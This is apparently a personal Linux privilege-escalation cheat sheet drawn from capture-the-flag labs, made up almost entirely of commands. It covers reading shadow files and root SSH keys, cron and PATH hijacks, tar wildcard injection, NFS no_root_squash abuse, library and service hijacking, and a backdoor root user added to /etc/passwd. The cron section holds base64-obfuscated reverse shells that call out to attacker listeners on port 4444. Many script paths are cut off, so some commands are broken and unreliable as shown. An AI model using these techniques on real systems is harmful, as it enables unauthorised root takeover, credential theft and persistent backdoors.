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Privilege Escalation

PrivEsc: Exploits

  1. Identify the kernel version
  2. Search and find an exploit code for the kernel version of the target system
  3. Run the exploit

PrivEsc: Sudo

  1. sudo -l
  3. Leverage LD_PRELOAD
  4. Use can run script as other user sudo -u <user-name> /opt/script/

PrivEsc: root

su root
|<- root

PrivEsc: Pass

  1. check ls -la /etc/passwd, cat /etc/passwd and ls -la /etc/shadow - for passwords
  2. check history files - for passwords
  3. check cd /var/backups/ - for passwords
  4. check each cd /home dir - for passwords
  5. check current processes watch -n 1 "ps -aux | grep pass"
  6. check tpc connection sudo tcpdump -i lo -A | grep "pass"

PrivEsc: SUID

If the SUID permissions are set, the binary will run with the permissions of the file owner, check

find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

PrivEsc: Capabilities

getcap -r / 2>/dev/null

PrivEsc: Interesting groups

DISK Group

This privilege is almost equivalent to root access as you can access all the data inside of the machine.

df -h #Find where "/" is mounted
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow

ADM Group

  • possibility to read log, with that we can find some interesting events
    grep "CRON" /var/log/cron.log
    grep "CRON" /var/log/* 2>/dev/null


PrivEsc: Ld_preload

  • sudo -l
  • [[leverage-ld-preload]]

PrivEsc: Cron - Overwrite script

cat /etc/crontab
cat /etc/cron*
* * * * *  root /home/karen/ 🔥
* * * * *  root /tmp/          🔥
* * * * *  root /home/user/ 🔥

🔨 /home/karen/

overweire file

echo '#!/bin/bash' > /home/karen/
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /home/karen/
chmod +x /home/karen/
wait 1m for cron job
cd /tmp
./bash -p

🔨 /tmp/

setup listener

nc -lvnp 4444
overwrite file
echo "IyEvdXNyL2Jpbi9weXRob24z" | base64 -d > /tmp/ 
echo "" >> /tmp/ 
echo "aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjguNi4xMDMiLDQ0NDQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCIvYmluL2Jhc2giKQ==" | base64 -d >> /tmp/

🔨 /home/user/

setup listener

nc -lvnp 4444
overwrite file
echo "IyEvYmluL2Jhc2g=" | base64 -d > /home/user/
echo "" >> /home/user/
echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE4Ljc0LjE0My80NDQ0IDA+JjE=" | base64 -d >> /home/user/

PrivEsc: Cron - Overwrite path

check cron configuration, pay attention to PATH

  • path start with /home/user
cat /etc/crontab
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin <--
* * * * *  root <-


check the location of

  • the location of script is /usr/local/bin/
  • that mean if you put upper in hierarchy it will be executed instead of orginal
find / -name 2>/dev/null
#-> /usr/local/bin/

crete new in /home/user

echo '#!/bin/bash' > /home/user/
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /home/user/
chmod +x /home/user/

waith for cron job

cd /tmp
./bash -p

PrivEsc: PATH

  1. What folders are located under $PATH
  2. Does your current user have write privileges for any of these folders?
  3. Can you modify $PATH?
  4. Is there a script/application you can start that will be affected by this vulnerability?
    echo $PATH
    find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
    find / -writable 2>/dev/null | grep 'home'
    export PATH=/tmp:$PATH


we have something like this

ls -la test
-rwsr-xr-x 1 root root 16712 Jun 20  2021 test
if we execute that program it return error - we can see that script / binary thm is missing
sh: 1: thm: not found
we can recreted missing thm binary / script with that content, that will create new user hacker with password hacker
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
base64 is a great way to transfer payload
echo "ZWNobyAnaGFja2VyOiQxJGhhY2tlciRUenlLbHYwL1IvYzI4Ui5HQWVMdy4xOjA6MDpIYWNrZXI6L3Jvb3Q6L2Jpbi9iYXNoJyA+PiAvZXRjL3Bhc3N3ZA==" | base64 -d > thm
chmod +x thm # <- if missing
last, update PATH
echo $PATH
export PATH=/home/murdoch:$PATH
echo $PATH
BOOM! now executing test will execute thm and that will create new root hacker
su hacker
Password: hacker

PrivEsc: TAR

echo 'cp /bin/bash /tmp/bash' >
echo 'chmod +s /tmp/bash' >>
echo "" > "--checkpoint-action=exec=sh"  
echo "" > --checkpoint=1
chmod +x
/tmp/bash -p

PrivEsc: NFS

backdoor bash

  1. [on target] run
    cat /etc/exports
    /home/backup *(rw,sync,insecure,🔥no_root_squash,no_subtree_check)
    /tmp *(rw,sync,insecure,🔥no_root_squash,no_subtree_check)
    /home/ubuntu/sharedfolder *(rw,sync,insecure,🔥no_root_squash,no_subtree_chec
  2. [on target] check if any share has no_root_squash

  3. [on kali] if yes mount that share

    mkdir -p /tmp/nfs_hacked
    sudo mount -t nfs $IP:/tmp /tmp/nfs_hacked
    $IP - ip of target machine

  4. [on target] - copy bash

    cd /tmp
    cp /bin/bash .
    ls -la
    -rwxr-xr-x  1 karen karen 1183448 Jun 17 12:50 bash

  5. [on kali] - set new owner and +s bit

    cd /tmp/nfs_hacked
    sudo su
    chown root:root bash
    chmod +s bash
    chmod +x bash

  6. [on target] - execute bash

    cd /tmp
    ls -la
    -rwsr-sr-x  1 root  root  1183448 Jun 17 12:50 bash
    ./bash -p
    # BOOM we have root

  7. clean

    sudo umount /tmp/nfs_hacked

create malicious nfs binary

  1. run
    cat /etc/exports
  2. check if any share has no_root_squash
  3. if yes mount that share
    mkdir -p /tmp/nfs_hacked
    sudo mount -t nfs $IP:/home /tmp/nfs_hacked
  4. create nfs.c file in that share

    int main() 
       return 0;

  5. compile

    sudo su
    gcc nfs.c -o nfs -w
    chmod +s nfs

  6. go to target machine and execute nfs

  7. clean

    sudo umount /tmp/nfs_hacked

PrivEsc: Writable files


ls -la /etc/passwd
Generate a password with one of the following commands.
openssl passwd -1 -salt hacker hacker
# mkpasswd -m SHA-512 hacker
# python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Add user hacker to passwd
echo 'hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd

PrivEsc: Hijack shared library

find all binaris with suid

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-s
for each interesting finding, check stack trace
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
#-> open("/usr/lib/", O_RDONLY) = 3
#-> open("/lib/", O_RDONLY)        = 3
#-> open("/home/user/.config/", O_RDONLY) = -1 ENOENT (No such file or directory)
- as you see shared library from /home/user/.config/ is missing recreate missing
echo '#include <stdio.h>' > libcalc.c
echo '#include <stdlib.h>' >> libcalc.c
echo '' >> libcalc.c
echo 'static void inject() __attribute__((constructor));' >> libcalc.c
echo '' >> libcalc.c
echo 'void inject() {' >> libcalc.c
echo '    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");' >> libcalc.c
echo '}' >> libcalc.c
gcc -shared -o /home/user/.config/ -fPIC /home/user/.config/libcalc.c
execute binary
#-> root

PrivEsc: Hijack service

find all binaris with suid

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816762 8 -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
for each interesting finding, check stack
strings /usr/local/bin/suid-env
#-> fffff.
#-> l$ L
#-> t$(L
#-> |$0H
#-> service apache2 start     <- -------------------------- TARGET
create malisus service
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
cd /tmp
gcc /tmp/service.c -o /tmp/service
update path
export PATH=/tmp:$PATH
#-> root

PrivEsc: Hijack service path

find all binaris with suid

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816764 8 -rwsr-sr-x 1 root staff 6899 May 14  2017 /usr/local/bin/suid-env2
for each interesting finding, check stack
strings /usr/local/bin/suid-env2
#-> l$ L
#-> t$(L
#-> |$0H
#-> /usr/sbin/service apache2 start <- --------------------- TARGET
create malicious function
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
#-> root
